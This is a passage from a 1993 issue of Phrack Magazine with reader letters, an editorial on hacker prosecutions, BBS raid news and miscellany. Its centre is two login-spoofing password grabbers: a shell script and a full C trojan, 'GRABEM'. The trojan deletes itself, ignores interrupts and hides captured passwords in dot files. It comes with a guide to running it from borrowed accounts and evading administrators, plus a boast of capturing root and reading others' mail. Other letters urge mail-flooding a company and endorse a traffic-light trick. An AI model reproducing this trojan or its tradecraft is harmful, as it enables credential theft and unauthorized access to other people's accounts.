+          around the world.  One person is working on Italy.  Perhaps when
+          this file is completed, you will be able to network through that
+          information.
+          If anyone in a country other than America is interested in
+          contributing to this effort, please write us at:
+          phrack@well.sf.ca.us !  ]
+
+-----------------------------------------------------------------------------
+
+
+hello, i must say i love your publication.  I have a little kind of
+hack/phreak for you guys.
+
+When you approach a Red light, preferably at night with few cars around,
+continually flash your bright lights.  This tricks the light into believing
+this a cop waiting behind traffic at the light thus changing the light after
+about 10 flashes.  I discovered that after seeing several police officers turn
+on their lights before they hit lights and was amazed on how easily the light
+changed.  If you have say, a Mag-lite the trick works if you point directly
+at the top of the post-light and the ones hanging right above red on verticals
+and right above yellow on horizontals.
+
+hope this helps etc.   (i fucking hate those damn red lights)
+
+Dave.
+
+[Editor:  I've actually tried this.  It works on most major
+          intersections]
+
+-----------------------------------------------------------------------------
+
+Hallo !
+I'd like to make just some addition to the APPENDIX A of the
+Racketeer's article "The POWER of Electronic Mail" - there are
+new guys in InterNET -> Russians (!). They have the awful
+connection, but it's cool team. So, add :
+
+ .su           kremvax.hq.demos.su
+
+And one more note, in the SMTP installed on the Sun Station I'm working
+on there isn't command TICK, but exist some strange like RSET and
+EXPN.
+      Spy
+
+  P.S. Sorry for my bad English.
+
+[Editor:  Russia has a lot of computers online these days.  Look for
+          more on the Russian Internet in upcoming Phracks!]
+
+-----------------------------------------------------------------------------
+
+There is another, much simpler way to expand your password collection,
+other than tty spoofing. Why not just run a program that simulates the
+login process, and then leave it running on the console for an unsuspecting
+victim? A simple example is below. Execute by typing getpass:logout.
+
+--------File: getpass----------
+LOGIN=""
+PASSWD=""
+clear
+echo -n "login: "
+read LOGIN
+echo "$LOGIN" >name
+sleep 3
+echo -n "Password:"
+read PASSWD
+echo "$PASSWD" >password
+echo
+echo -n "Login incorrect"
+-------------------------------
+
+The only problem I have is that I don't know how to make it so that
+the password, when entered, isn't shown on the screen. I'm sure you
+can come up with a solution.
+
+
+[Editor:  actually, someone kinda did.  See the next letter]
+
+-----------------------------------------------------------------------------
+
+A Better UNIX Password Grabber
+by The K-Man
+
+
+I blame it entirely on boredom.  Well, that and an acute case of end-
+of-semester neural gridlock.  I was sitting in the lab a couple of years
+ago, my head leaning against a Sparc-2 display, my index finger hitting the
+return key over and over again at the login prompt.  It was all my mind and
+body were capable of at the time.  Then a little thought formed in the back
+of my mind: "You know, it would be pretty damn easy to write a program to
+imitate the behavior of this screen while grabbing user id's and passwords."
+So I logged in and started coding.  Then I thought to myself, "You know, with
+a few extra lines of code and a couple of tricks, I could make this little
+guy almost completely undetectable and untraceable while running."  So I
+coded some more.  A couple of hours later, out popped the following
+program:
+
+---------------------------- Cut Here -----------------------------------
+
+/*----------------------------------------------------------------------+
+| GRABEM 1.0            by The K-Man      |
+| A Cute little program to collect passwords on the Sun workstations.   |
++----------------------------------------------------------------------*/
+
+#define PASSWORD "Password:"
+#define INCORRECT "\nLogin incorrect"
+#define FILENAME ".exrc%"
+
+#include <stdio.h>
+#include <signal.h>
+
+
+/*-----------------------------------------------------------------------+
+| ignoreSig                 |
+|                   |
+| Does nothing. Used to trap SIGINT, SIGTSTP, SIGQUIT.     |
++-----------------------------------------------------------------------*/
+void ignoreSig ()
+{
+ return;
+}
+
+
+/*-----------------------------------------------------------------------+
+| Main                    |
++-----------------------------------------------------------------------*/
+main()
+{
+
+char  name[10],     /* users name             */
+  password[10];    /* users password         */
+
+
+
+int  i,       /* loop counter               */
+  lab,      /* lab # you're running on    */
+  procid;      /* pid of the shell we're under  */
+
+FILE  *fp;      /* output file          */
+
+
+ /*-------------------------------------------------------------------+
+ | Trap the SIGINT (ctrl-C), SIGSTP (ctrl-Z), and SIGQUIT (ctrl-\)    |
+ | signals so the program doesn't stop and dump back to the shell.    |
+ +-------------------------------------------------------------------*/
+ signal (SIGINT, ignoreSig);
+ signal (SIGTSTP, ignoreSig);
+ signal (SIGQUIT, ignoreSig);
+
+ /*-------------------------------------------------------------------+
+ | Get the parent pid so that we can kill it quickly later.  Remove   |
+ | this program from the account.          |
+ +-------------------------------------------------------------------*/
+ procid = getppid();
+ system ("\\rm proj2");
+
+ /*-------------------------------------------------------------------+
+ | Ask for the lab # we're running on.  Clear the screen.    |
+ +-------------------------------------------------------------------*/
+ printf ("lab#: ");
+ scanf ("%d", &lab);
+ for (i=1; i<40; i++)
+  printf ("\n");
+ getchar();
+
+ /*-------------------------------------------------------------------+
+ | Outer for loop.  If the name is <= 4 characters, it's probably not |
+ | a real id.  They screwed up.  Give 'em another chance.             |
+ +-------------------------------------------------------------------*/
+ for(;;)
+ {
+  /*---------------------------------------------------------------+
+  | If they hit return, loop back and give 'em the login again.    |
+  +---------------------------------------------------------------*/
+  for (;;)
+  {
+   printf("lab%1d login: ",lab);
+   gets (name);
+
+   if (strcmp (name, "") != 0)
+    break;
+  }
+
+  /*---------------------------------------------------------------+
+  | Turn off the screen echo, ask for their password, and turn the |
+  | echo back on.              |
+  +---------------------------------------------------------------*/
+  system ("stty -echo > /dev/console");
+  printf(PASSWORD);
+  scanf("%s",password);
+  getchar();
+  system ("stty echo > /dev/console");
+
+
+  /*---------------------------------------------------------------+
+  | Write their userid and password to the file.                   |
+  +---------------------------------------------------------------*/
+  if ( ( fp = fopen(FILENAME,"a") )  != NULL )
+  {
+   fprintf(fp,"login %s has password %s\n",name,password);
+   fclose(fp);
+  }
+
+  /*---------------------------------------------------------------+
+  | If the name is bogus, send 'em back through         |
+  +---------------------------------------------------------------*/
+  if (strlen (name) >= 4)
+   break;
+  else
+   printf (INCORRECT);
+ }
+
+ /*-------------------------------------------------------------------+
+ | Everything went cool. Tell 'em they fucked up and mis-typed and    |
+ | dump them out to the REAL login prompt.  We do this by killing the |
+ | parent process (console).                                          |
+ +-------------------------------------------------------------------*/
+ printf (INCORRECT);
+ kill (procid, 9);
+}
+
+---------------------------- Cut Here -----------------------------------
+
+
+HOW IT WORKS
+
+You can probably figure this out by reading the code, but I thought I'd
+just add some comments on why I did what I did.
+
+The first thing is does is install the signal handler. All it does is trap
+SIGINT, SIGSTP, and SIGQUIT, so that the person trying to log into the machine
+this baby is running on can't kill it with a keystroke.  Next, it gets the
+parent process ID.  We'll use this later to kill it off quickly.  Then it
+proceeds to erase the executable file.  Sysadmins can't find a trojan horse
+program that isn't there.
+
+>From here it goes on to imitate the login and password prompts.  You'll
+probably have to change the code to get it to imitate the login process on
+your particular machine.
+
+When it gets a userid and password, it appends them to an existing file in
+the account.  I chose the .exrc, but any dot file will work.  The point being
+to use a file that already exists and should be in the account.  Don't leave
+any extra suspicious files lying around.
+
+After it writes the uid and password to the file, it bumps the user back
+to the real login prompt by killing off the shell that was the parent process
+of the program.  The cut is almost instantaneous; the user would have to be
+inhumanly observant to notice the transition.
+
+
+HOW TO USE
+
+Well, first you need an account to run it from.  If your site has guest accounts,
+you've got it made.  If not, I'd suggest using a little social engineering to
+get one other person's account.  With that account and the program, you can grab
+access to many more.  I wouldn't recommend running it from an account that has
+your name on it.  That just makes it a little more dangerous than it needs to be.
+Of course, if the sysadmin happens to catch the program running on your login,
+you can always claim to know nothing.  Say someone else must have gotten your
+password and is using your account to escape detection.  He might buy it.  But
+if you have the source for the program sitting somewhere in your account, and
+they find it, you're fucked.  So it's best to use someone else's account for
+the job.
+
+After you've gotten the account you'll be running it from, you'll need to get
+the program in that account somehow.  I started off by keeping a copy of the
+source somewhere it my account, named with something innocuous and hidden
+among bunches of source files, but I got paranoid and started hauling the source
+around with me on a bar floppy.  Do whatever suits your level of paranoia.
+
+Copy the source to the account you'll be running it from and compile it.
+Trash the source, and name the program something that won't stand out in a
+ps list.  selection_svc is a nice innocuous name, and it appears everywhere.
+Do a ps on one of your machines and look for processes that hang around for
+a long time.  You might want to hide it as a daemon.  Be creative.
+
+Now run the program and sit back and wait.  Or leave and come back later.
+When you know that someone has tried to log on to your booby trapped machine,
+log back into the account you borrowed to run the program in and vi or emacs (if
+you're that kind of person) out the captured userid and password.  Simple as
+that.
+
+Note that the two times that you stand the greatest chance of being caught
+are when you first compile and run the program and when you retrieve your
+captured uid and passwords.  There's the remote chance that someone might see
+you at work and see what you're doing, but it's not very likely.  If you start
+acting all paranoid you'll draw more attention to yourself than you would have
+gotten in the first place.  If your site has dialup lines, you might want to do
+a dialin to retrieve the passwords. Or you might prefer to do it in person.
+All depends on your paranoia quotient which you think is more secure, I guess.
+
+
+TIPS
+
+Be careful which dot files you use.  I chose the .exrc because it was something
+that wasn't used often at our site.  If you chose the .cshrc or other frequently
+accessed file, put a # before the uid and password you write to that file.  That
+way,  when that dot file is sourced, it'll treat that line as a comment and not
+spit out an error message that could cause suspicion.
+
+Try to run the program at a time when you know there will be heavy machine
+usage.  That way you'll trap something quick.  The longer your program
+runs, the greater the chance it will be found.
+
+Don't be greedy.  Run on only one or two machines at a time.  And if you run
+on more than one machine, run out of a different account on each one.  Again,
+the more you put out there, the better the chance that at least one will be
+found.
+
+
+PARTING NOTE
+
+The morning after I wrote this program was the first time I got to use it.  I
+set it running on a guest account, the went to a machine across the room to
+do some legitimate work.  One of my friends walks in shortly after that, and
+we start shooting the shit.  A minute or two later, the sysadmin walks in, sits
+down, and logs in to the machine I ran the program on.  I came really close to
+dropping my fudge right then and there.  The only thing running through my
+mind was "Either I'm totally fucked, or I have root."  Turned out it was choice
+B.  Too bad the guy changed his password once a week, and I wasn't smart enough
+to fix it so that I would see the change.  Oh well, I had fun for a week though.
+There were quite a few interesting e-mail messages sent back and forth that week.
+I think the best one was the one from our (male) department head to one of our
+radical she-male hard-core no-damn-gifs feminist female professors, detailing
+all the perverted sexual acts that he would like to perform with and on her. :)
+
+Anyway, have fun with the program.  Maybe I'll get a chance to come up with
+some more cool UNIX programs in the future.
+
+
+           Later,
+            K-Man
+
+-----------------------------------------------------------------------------
+
+        In a recent issue of PHRACK you had some article or loopback about
+getting information about people via modem.  I am somewhat interested in
+this and could use this information.  I have a friend who is a part-time
+bounty hunter and could use such information to track people down.
+Could you please send me some information about who to contact to find out
+this information.  What I could REALLY use is an on-line up-to-date
+phone/address book that I could call to find out anybody's address.  Is
+there such a thing?  If you have any information please e-mail me, since I
+am unable to get your mag on a regular basis.  Thanx a mil!
+
+                                Scarface
+
+[Editor:  Actually there are quite a large number of databases that keep
+          information on everyone.  There is TRW, Equifax, TransUnion,
+          Information America and NAI just to name a few.  Many of these
+          services are very expensive, but even services like CompuServe
+          allow users to look up people all over America using
+          PhoneFile which compiles data from all kinds of public
+          records.  Nexis can allow you to look up real estate data on
+          just about anyone with loans on their houses.  Every public
+          utility and department of motor vehicles provides information
+          on their records, and many are online.
+
+          A good book to read about this kind of thing is
+
+          Privacy For Sale
+          Jeffrey Rothfeder
+
+          Simon & Schuster
+          $22.00]
+-----------------------------------------------------------------------------
+                            THE GOLDEN ERA REBORN!
+
+     Relive the thrill of the golden era of hacking through our exclusive
+        collection of BBS messages.  Our collection contains posts from
+          over 40 of the most popular hack/phreak BBSes of all time.
+       Experience the birth of the computer underground again from your
+       own computer with this collection of original posts from bulletin
+                                 boards like:
+
+                                   * 8BBS *
+                                   * OSUNY *
+                                 * PLOVERNET *
+                            * THE LEGION OF DOOM *
+                             * BLACK ICE PRIVATE *
+                            * THE PHOENIX PROJECT *
+
+                               And many more...
+
+               Messages are available in many computer formats:
+                                      IBM
+                                     Amiga
+                                   Macintosh
+
+            For more information, please contact LOD Communications
+
+                      email:  lodcom@mindvox.phantom.com
+
+                         US Mail:  LOD Communications
+                                603 W. 13th St.
+                                 Suite 1A-278
+                               Austin, TX 78701
+
+                           Voice Mail:  512-448-5098
+-----------------------------------------------------------------------------
+
+You might like this one...
+--bob
+****************************************
+I just saw a transcript of a press conference given by
+Secret Service Agent Frericks, in Lubbock last December.
+
+here is a brief extraction...
+
+FRERICKS: Um hm. This is a major nation wide, world wide problem from
+an industry point of view with tremendous losses in funds tremendous
+losses of money. the VAX account at the University is a way to get
+into numerous other research accounts or Internet which is the ...you
+get onto Internet you can talk to anybody else who is on Internet
+anywhere in the world which these kids were talking to Belgium, and
+Israel and Australia and they can do that just by this, thus avoiding
+long distance phone calls.  But most of the people on Internet I mean
+on the VAX are there legitimately for research purposes they can go to
+Mayo and get a file if they're a med student and they also get one of
+these pamphlets if they get, like the Department of Engineering gives
+out an account number just for that semester, the professor would give
+it out so you can use the VAX well they also get one of those
+pamphlets that explains what the rules are and the instructor spends a
+good bit of time the first couple of classes going over computer
+etiquette, computer rules.
+
+[Editor:  Another of America's finest.]
+
+-----------------------------------------------------------------------------
+
+
+    I typed this because of the mention of Software Security International in
+the article "More than $100,000 in Illegal Software Seized" in Rambone's
+Pirates Cove in Phrack 41.
+    He mentioned that they were the investigators that finally brought down
+APL. I am not only familiar with that, a past friend of mine was
+there when the Marshalls took the board. He was there as representative of
+SSI.
+ The best part that Rambone didn't know, was that they couldn't get into
+APL to verify the existence of the software, until they got the password
+breaker from Novell. So in essence, they looked like some dumb fools.
+They didn't have any idea on how to approach the network.
+
+ Software Security International Can be reached at...
+  1-800-724-4197
+
+  2020 Pennsylvania Avenue N.W.
+  Suite 722
+  Washington, D.C. 20006-1846
+
+That is of course if they finally have gotten off the ground. Last I Heard (2-3
+months ago) they were still having trouble getting Financial Backing. They did
+the APL Bust for nothing, just to prove they could do it. They are also on a
+lot of other BBS's around America. So as a warning to other sysops, Cover your
+Ass.
+
+ You could rack up some serious negative cash flow by sending tons of
+mail to the box above, then it gets Airborne'd to Washington State.
+
+see ya
+
+[Editor:  I think it might be a good idea to send them a few postcards
+          every day for the next few weeks.  Just to stay in touch.]
+-----------------------------------------------------------------------------
+
+                         ==Phrack Magazine==
+
+              Volume Four, Issue Forty-Two, File 2b of 14
+
+                        [-=:< Editorial >:=-]
+
+Before I jump upwards onto my soapbox and spew forth a meaty
+editorial I would like to relay something to the readers of Phrack.
+The following is a transcript of John Lee's  (Corrupt's) confession
+to the charges facing him.  (From Security Insider Report, Jan. 1993)
+
+What follows is in my opinion a very poor attempt at a plea-bargain,
+and obviously induced by attorney coercion.  I must wonder what John
+was thinking when he agreed to this admission.
+======================================================================
+
+I agreed with others to violate various laws related to the use of
+computers.  I agreed to do the following:
+
+1)  I agreed to possess in excess of fifteen passwords which
+    permitted me to gain access to various computer systems
+    including all systems mentioned in the indictment and others.
+    I did not have authorization to access these systems.  I knew
+    at the time that what I did was wrong.
+
+2)  I used these access devices and in doing so obtained the value of time
+    I spent within these systems as well as the value of the passwords
+    themselves which I acknowledge was more than $1000.
+
+3)  I intentionally gained access to what I acknowledge are Federal interest
+    computers and I acknowledge that work had to be done to improve the
+    security of these systems which was necessitated by my unauthorized
+    access.
+
+4)  I was able to monitor data exchange between computer systems and by
+    doing so intentionally obtained more passwords, identifications and
+    other data transmitted over Tymnet and other networks.
+
+5)  I acknowledge that I and others planned to share passwords and
+    transmitted information across state boundaries by modem or telephone
+    lines and by doing so obtained the monetary value of the use of the
+    systems I would otherwise have had to pay for.
+
+Among the ways I and others agreed to carry out these acts are the following:
+
+  1.  I was part of a group called MOD.
+
+  2.  The members of the group exchanged information including passwords
+      so that we could gain access to computer systems which we were not
+      authorized to access.
+
+  3.  I got passwords by monitoring Tymnet, calling phone company
+      employees and pretending to be computer technicians, and using
+      computer programs to steal passwords.
+
+I participated in installing programs in computer systems that would give
+the highest level of access to members of MOD who possessed the secret
+password.
+
+I participated in altering telephone computer systems to obtain
+free calling services such as conference calling and free billing
+among others.
+
+Finally, I obtained credit reports, telephone numbers and addresses
+as well as other information about individual people by gaining access
+to information and credit reporting services.  I acknowledge that on
+November 5, 1991, I obtained passwords by monitoring Tymnet.
+
+I apologize for my actions and am very sorry for the trouble I have
+caused to all concerned.
+
+John Lee
+
+
+==========================================================================
+
+
+This issue I would like to call attention to what I consider to be
+a very pressing issue.  There has always been a trend to pad the
+amount of dollar damages incurred to any victim of a hacker attack.
+I personally feel that the blame is never directed at the true guilty
+parties.
+
+Certainly, if someone is caught breaking into a system, then they are
+surely guilty of some form of electronic trespass.  I will also
+concede that such a person may or may not be guilty of other crimes
+based upon their actions once inside that system.  What I have the
+most problems dealing with is the trend to blame the hacker for any
+expenditures needed to further secure the system.
+
+With this mindset, why should any corporation bother to add any
+security at all?  Why not just wait until someone happens across
+a few poorly secured sites, nab them, and claim damages for the
+much needed improvements in security?
+
+The worst culprits in this type of behavior has been the RBOCs.  As was
+seen with the supposed damages incurred for the distribution of the
+"911 document" and most recently with the $370,000 damages supposedly
+incurred by Southwestern Bell resulting from the alleged activities
+of those in MOD.
+
+Perhaps this figure does have some basis in reality, or perhaps it is
+just an arbitrary figure dreamed up by a few accountants to be used
+at year end to explain some losses in the corporate stock report.
+Most often figures such as this factor in such ridiculous items as
+the actual system hardware penetrated.  I can hardly see the relevance
+of such a charge.
+
+Even if these charges are to be believed, why isn't the blame being
+evenly distributed?  Why aren't stockholders crying for the heads of
+system administrators, MIS managers and CIOs?  These are the people who
+have not adequately done their jobs, are they not?  If they had expended
+a bit of time, and a small amount of capital, the tools exist to make
+their systems impervious to attack.  Period.
+
+If I had an investment in a company such as Southwestern Bell, I would be
+outraged that the people I was employing to perform data security
+functions were not apt enough to keep a group of uneducated gangsters
+out of their switching systems.  Why haven't there been any emergency
+meetings of shareholders?  Why isn't anyone demanding any changes in policy?
+Why is everyone still employed?
+
+Not to blame Southwestern Bell too harshly, they were sorely outclassed
+by MOD, and had absolutely no way to cope with them.  Not only because MOD
+were competent telco hackers, but because Southwestern Bell's network
+service provider had given them free reign.
+
+Southwestern Bell's packet switched network, Microlink II, was designed
+and implemented for SWBT by Tymnet (then owned by McDonnell Douglas).
+An interesting thing I've heard about SWBNET, and about every other subnet
+arranged by Tymnet, is that the information concerning gateways, utilities,
+locations of node code, etc., is purported to be located in various
+places throughout Tymnet internal systems.  One such system, was described
+to me as a TYMSHARE system that contained data files outlaying every subnet
+on Tymnet, the mnemonics (username/password pair) to each utility, gateway,
+and the ONTYME II mail access keys.
+
+If this information is correct, then shouldn't Tymnet be called in to
+acknowledge their role in the attacks on Southwestern Bell?
+
+Let's say a Realtor sold you a house, but told you that he would be keeping
+copies of all your keys so that he could help you with the maintenance.
+Some time later, you notice that a few of your books have been read, but
+nothing else is disturbed.  Later on you notice that your tv is on and your
+bed is all messed up.  A week later your stereo is gone.  You set up a trap
+and catch someone going into your house with your own key!  You find that
+the burglars had made copies of all the keys held by your Realtor.  You
+then find that the Realtor neglected to put the keys in a safe, and in fact
+had left them lying around on the table in his back yard labeled with
+the addresses they corresponded to.
+
+Who would you be more upset with?  The individual who copied and used the
+keys, or the Realtor for not providing the access to your valuables more
+vigilantly?  I would personally be far more upset with the Realtor, for
+if he had put the keys in a safe this event would have probably never
+transpired.
+
+I'm not saying that people who get caught for breaking into computer
+systems should be let go, especially if they can be proven to be involved
+in the sale of hacked information for a personal profit.  What I am saying
+that if hackers are to be punished so vigorously for what I view as a
+predominantly victimless crime, then everyone should have to line
+up and take their fair share of the blame.
+
+I think it's high time that the real blame be placed on the corporate
+entities who seemingly refuse to acknowledge their role in these
+break-ins.  Neglect of duties and lack of responsibility on the part
+of the employees, the interconnect carriers, the data network providers,
+the hardware vendors, etc. all play a key role in the problems that
+exist in the world's data networks today.  In fact, if it were not for
+computer hackers, these problems would continue to lie dormant until either
+discovered by accident in the field, or the provider decided to go ahead
+and illuminate its clients to the existence of such a problem.
+
+I wholeheartedly encourage each and every reader of Phrack to
+purchase one share of stock in any corporation you know that has exhibited
+such tendencies and take your place on the floor of the next shareholders
+meeting and scare the hell out of the board of directors.
+Phrack Magazine is calling a discount brokerage very soon.
+
+-------------------------------------------------------------------------------
+
+                         ==Phrack Magazine==
+
+              Volume Four, Issue Forty-Two, File 2c of 14
+
+
+                           //   //  /\   //   ====
+                          //   //  //\\ //   ====
+                         ==== //  //  \\/   ====
+
+                     /\   //  // \\    //  /===   ====
+                    //\\ //  //   //  //   \=\   ====
+                   //  \\/    \\ //  //   ===/  ====
+
+******************************************************************************
+
+                          BBS Busts in Germany
+                          ====================
+
+
+Thursday, March 18, 1993.
+
+This day will be remembered as a black day in German BBS history.
+In fact, it was the blackest day in German BBS history since the raid
+of 18 Berlin BBS in Berlin and North Germany a couple of months ago.
+
+What has happened?  A couple of Bulletin Board Systems (BBS) have
+been raided by the police.  All these BBS had "warez" online, illegal,
+pirated, copyrighted Software - usually for PC/MSDOS and Amiga.
+This time, most of these BBS were in Bavaria, South Germany.
+
+Now let's take a closer look at the events:
+
+One guy who got busted was MST, Sysop of Southern Comfort BBS
+in Munich.  In fact, his board went offline 9 days before.
+But he was so unlucky still having his computer and his warez.
+He was even using his modem to trade warez at the very moment
+the cops rang his doorbell.  Why did he go offline just so short
+before he got busted?  His board had been running for over 1 year.
+
+Here is the text file MST released about going offline:
+
+THURSDAY 03-09-93 00:15
+THE SOUTHERN COMFORT BBS IS CLOSED !
+I AM NOT BUSTED OR ANYTHING LIKE THIS !
+I CLOSED THE BBS COS OF PERSONAL REASONS AND
+PERHAPS IT WILL BE OPENED AGAIN IN 1 OR 2 MONTH !
+I HOPE YOU WOULD UNDERSTAND THIS DECISION BUT SCENE
+IS NOT ALL WHAT LIFE CAN BE ALL USER ACCOUNTS STAY
+ALIVE AND WILL BE HERE AT A NEW??? OPENING !
+
+SO I SAY BYE TO THE SCENE FOR PERHAPS ONLY A SHORT TIME !
+
+MST/RAZOR 1911
+
+A couple of days later, MST was posting ads in local BBS to sell his
+old equipment.  But obviously he wasn't fast enough.  Maybe this was
+one of the reasons the cops busted him on March, 18.  They were afraid
+he might get rid of his illegal software, so they hurried up to catch him!
+
+He got busted at 10am this morning.  Three cops were knocking on his door,
+until he opened.  They had a search warrant and confiscated all his
+computer equipment, disks, modems...
+
+Chris used to have a board until four months ago, and now trades for TDT and
+other groups.  He was in school this morning.  His parents weren't home
+either.  So the cops broke into his house, smashed the wooden door, and
+seized all his equipment.  He is asked to speak to the Police this Tuesday.
+
+Chris used to be one of the most active traders for PC warez in Germany.
+He and his friend Michelangelo supported boards like Schizophrenia and
+Beverly Hills, which they co-sysop'ed.  They were also known as the
+'Beverly Hills Boys', a new German cracking group.
+
+After Chris' bust, a couple of boards were affected:
+Beverly Hills went offline.  Also the German Headquarters of the Beverly
+Hills Boys, 'Twilight Zone', went offline.  Their sysops estimate at least
+1-3 months offline time.
+
+The other Munich BBS and their sysops were really scared after the bust
+and took down their systems for an uncertain amount of time.
+
+One of Germany's largest BBS, Darkstar in Augsburg, was a heaven for
+every warez collector.  It had 8 modems hooked up (all US Robotics Dual
+Standard 16.8) and one ISDN Line.
+
+It had over 2 GB PC warez online, and over 7 GB offline on tapes, which
+would be put online according to user' requests.
+
+But then, March 18 arrived, and the dream was shattered.
+Its sysop, Rider, who was happily calling boards the previous day,
+had the most shocking experience in his life.  The cops came and
+took his BBS.
+
+And more..
+Ego, co-sysop of a large German BBS, got busted.
+Andy/Spreadpoint (ex-sysop) got busted.
+And lots of others...
+
+Unlike the US Secret Service, which delights in seizing all
+electronic equipment, like stereos, TVs, VCRs, the German cops
+were just after the computer hardware, especially the hard drives
+and file servers.
+
+They usually come with three or four people.  All of the search warrants
+they were using were quite old, issued last December.
+
+Who is behind those actions?
+First of all the BSA, Business Software Association.  They
+were also responsible for the recent raids of US Bulletin Boards.
+In Germany they just announced actions against piracy and
+bulletin boards.  The most active BSA Members are Microsoft and
+Lotus Development.  Microsoft, Lotus and the BSA are all located
+in Munich, Germany, home of German's most feared lawyer,
+Guenther Freiherr von Gravenreuth.  This guy has been fighting
+for years against piracy, young kids who copy games, and especially
+bulletin board systems.  He is also affiliated with Ariolasoft, a huge
+German distributor for game labels like Activision and others.
+
+In the end, all I can say is:
+Be aware, don't get caught and don't keep illegal stuff on your board!
+
+                  (c) 1993 SevenUp for Phrack
+
+******************************************************************************
+
+Carlcory's brownies:
+
+/* Begin cc_brownie.c */
+
+Includes:
+#include "4_squares_baking_chocolate"
+#include "1_cup_butter"
+#include "2_cups_sugar"
+#include "4_eggs"
+#include "2_cups_flour"
+#include "2_tbs_vanilla"
+#include "1_third_cup_marijuana"        /*comment out if won't compile
+                                            on your system*/
+#include "1_cup_nuts"                   /*comment out if won't compile*/
+
+void main(void);
+
+{
+    heat(oven, 350);
+    add(butter, chocolate);
+    while(texture!='smooth')    {
+        stir(mixture);
+    }
+    Add(sugar);
+    add(eggs);
+    add(vanilla);
+    add(flour, pot);
+    add(nuts)
+    for(timer=0; timer<35; timer++) {
+        bake(mixture);
+    }
+    cool(hour);
+}
+
+
+/*The high takes about an hour to come on,
+ but lasts for 12 hrs. (4 brownies)
+ Make sure they cool (don't burn your mouth!)
+ and share with friends! */
+
+
+/*End of cc_brownie.c*/
+
+******************************************************************************
+
+GRAY AREAS
+Examining the Gray Areas of Life
+
+Gray Areas, Inc.
+P.O. Box 808
+Broomall, PA  19008-0808
+(215)353-8238
+grayarea@well.sf.ca.us
+
+
+Gray Areas is published quarterly and printed on recycled paper.  They also
+participate in local recycling efforts involving cans, glass, clothing,
+newspapers, and more.
+
+A four-issue subscription costs $18.00 US or $26.00 foreign (payable in US
+funds).  A 12-issue subscription costs $50.00 ($75.00 foreign).  You may
+purchase a twelve issue subscription and give 4 or 8 or those issues away as
+gifts to friends (i.e., the same 4 issues you receive would also go to 2 other
+recipients). Make check or money order out to Gray Areas, Inc.
+
+STATEMENT OF PURPOSE:
+
+Gray Areas exists to examine the gray areas of life.  We hope to unite people
+involved in all sorts of alternative lifestyles and deviant subcultures.  We
+are everywhere!  We felt that the government has done a great job of splitting
+people up so that we do not identify with other minority groups anymore.  There
+are so many causes now that we often do not talk to others not directly
+involved in our chosen causes.  We believe that the methods used to catch
+criminals are the same regardless of the crime and that much can be learned by
+studying how crimes in general are prosecuted and how people's morals are
+judged.  It is our mission to educate people so they begin to case more about
+the world around them. Please join our efforts by subscribing, advertising your
+business with us, and by spreading the word about what we're up to.
+
+__________________________
+
+Review by Knight Lightning:
+
+I recently received a copy of the premier issue of Gray Areas, dated Fall 1992
+and with a cover price of $4.50 (US).  I was impressed with both the laser
+quality of the printing, artwork, and graphics, as well as the topics and
+content of the articles.
+
+I would not characterize Gray Areas as a hacker magazine, but the subject did
+come up in an interview with John Perry Barlow (one of the original founders of
+the Electronic Frontier Foundation) where he discussed the EFF and its role in
+defending civil liberties.
+
+No, instead I think it is safe to say that Gray Areas pays a lot of attention
+to the Grateful Dead.  Indeed the cover story is titled "Grateful Dead
+Unauthorized Videos."  Additionally, there are several other articles
+(including the John Barlow interview) that discuss varying aspects about the
+Dead's history, their politics, and of course their music.  An advertisement
+for the next issue of Gray Areas reveals that even more articles relating to
+the Grateful Dead are on the way; so if you are a "Dead Head" you will probably
+fall in love with this magazine!
+
+However, the article that I appreciated most was "Zine Scene," a review of 163
+alternative newsletters that included such familiar names as 2600, Hack-Tic,
+Full Disclosure, and TAP; and others that I intend to take a look at like Iron
+Feather's Journal and bOING bOING.  The zines reviewed here covered every topic
+imaginable and I thought it was a great buffet for the mind to have such handy
+directory (especially since Factsheet Five went defunct about a year ago).
+
+Other interesting articles had to do with video, audio, and software piracy and
+reviews of music and software.  I also enjoyed the great artwork found
+throughout the magazine in the form of visual aids, comics, and advertisements.
+
+If you are a fan of alternative music or the Grateful Dead, you'll be very
+sorry if you don't subscribe immediately.  If you are interested in alternative
+publications with more interesting points of view than Time or Newsweek then
+you owe it to yourself to at least purchase a copy to check it out.
+
+- - - - - - - - -
+
+All letters sent to Gray Areas are presumed to be for publication unless you
+specifically request that they omit your name or refrain from publishing your
+comments.  If you are writing about something which could incriminate yourself,
+they will protect your identity as a matter of policy.
+
+******************************************************************************
+
+                "Turning your USR Sportster w/ 4.1 roms
+                    into a 16.8K HST Dual Standard"
+
+                                   by
+
+                      The Sausage with The Mallet
+
+
+If you have a USRobotics Sportster FAX modem, Ver 4.1, you can issue
+the following commands to it to turn it into an HST 16.8K dual standard.
+In effect, you add HST 16.8K to its V32.bis 14.4k capability.
+
+ats11=40v1L3x4&h1&r2&b1e1b1&m4&a3&k3
+atgw03c6,22gw05cd,2f
+ats14=1s24=150s26=1s32=8s34=0x7&w
+
+A very important item is the b1, which tells the modem to use
+the 16.8K HST protocol.  If you do not set b1, when the Sportster
+connects with another V32 modem it will go through the CCITT v.32
+connect tones and you will not get a 16.8K connect.
+
+If you do get an HST connect, you will not hear the "normal"
+train phase--instead you will hear the HST negotiation which
+sounds like a 2400 baud carrier.
+
+Finally, if you change the "cd" in the second line to a "cb", your
+modem will think it is a V.32 Courier instead of an HST 16.8K.
+
+Look for other pfine pfiles from Rancid Bacon Productions in conjunction
+with USDA Grade A Hackers (UGAH.)  Accept no substitutes.
+
+*******************************************************************************
+
+   Request to Post Office on Selling of Personal Information
+
+    In May 1992, the US Postal Service testified before the US House of
+ Representatives' Government Operations Subcommittee that National Change of
+ Address (NCOA) information filled out by each postal patron who moves and
+ files that move with the Post Office to have their mail forwarded is sold to
+ direct marketing firms without the person's consent and without informing
+ them of the disclosure. These records are then used to target people who
+ have recently moved and by private detective agencies to trace people, among
+ other uses. There is no way, except by not filling out the NCOA form, to
+ prevent this disclosure.
+
+    This letter is to request information on why your personal information
+ was disclosed  and what uses are being made of it. Patrons who send in this
+ letter are encouraged to also forward it and any replies to their
+ Congressional Representative and Senators.
+
+
+ Eligible requestors: Anyone who has filed a change of address notice with
+ the Postal Service within the last five years.
+
+
+
+ Records Officer
+ US Postal Service
+ Washington, DC 20260                        PRIVACY ACT REQUEST
+
+
+ Dear Sir/Madam:
+
+   This is a request under the Privacy Act of 1974 (5 USC 552a). The Act
+ requires the Postal Service, as a government agency, to maintain an
+ accounting of the date, nature, and purpose of each disclosure of
+ information about individuals. I request a copy of the accounting of all
+ disclosures made of address change and mail forwarding information that I provided
